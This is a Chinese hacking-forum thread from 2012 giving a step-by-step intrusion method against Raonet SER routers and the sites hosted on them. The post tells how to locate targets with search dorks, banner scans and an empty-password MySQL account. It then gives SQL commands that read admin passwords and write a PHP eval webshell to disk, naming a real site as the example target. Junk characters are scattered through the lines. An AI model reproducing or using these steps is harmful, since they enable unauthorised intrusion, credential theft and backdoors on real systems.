找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2834|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:8 V+ O! O% b0 o

0 e$ P0 a( w* V9 h1:google搜索'Raonet Subscriber Ethernet Router'" l3 `* H, c' a3 S# `

8 \8 x8 U# `/ w& F% V' q2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
. B2 ^; p% F* _* @. N" X2 q" Y; f) W5 \
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
3 ]: C' @* N- G. I* A( V' p6 H
  C4 H9 u; g0 ^* ~" U# ~//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
5 V& W% |4 t+ c! x+ O$ R3 D6 O9 f1 n( n" V. G
3 e' L5 x. G( d- B9 r
2 `& M7 Y( ^+ ]- P. }  J' A
入侵步骤:7 y: m, g5 \) J. m( r5 U9 F. U
0 W; U) B2 M1 B5 W) Q$ p& B) J
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php, @6 u/ Y6 l& f5 q3 Q& |( z
, \; G0 H! w* L/ Y
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
1 z) E& [6 @: B; V, p5 [3:得到密码后连接,查看GUI管理密码:
7 _% [/ x% F/ l7 b7 d9 F9 T5 H% Fuse ser_5005 O) g( \6 ~" P
select id,passwd from user;) v) E5 G0 x' z$ E
4:通过数据库写入webshell,执行命令:
" |  M+ l# d$ A  N7 r0 y4 xuse mysql;
* ^- N- F* n7 Z: z  jcreate table ok(cmd TEXT);: I8 |& V% _" W* y
insert into ok values("<?php @eval($_POST[cmd])?>");  q, m4 U# V) M
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
; n) Z" X0 j' U- i6 }( Y" W9 @drop table ok;
0 |9 i  v0 @6 R, ?
( X$ t; Q6 _  N! x. F6 d5:连接后门shell.php * F2 ]+ W& z0 c6 G6 p

' v2 P$ t3 V) S5 h4 @) Q# x6. 搞定!
) C+ i# y! H0 |# J$ a3 \
3 m; r  H; Y6 c5 d! Z  P+ f/ T
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表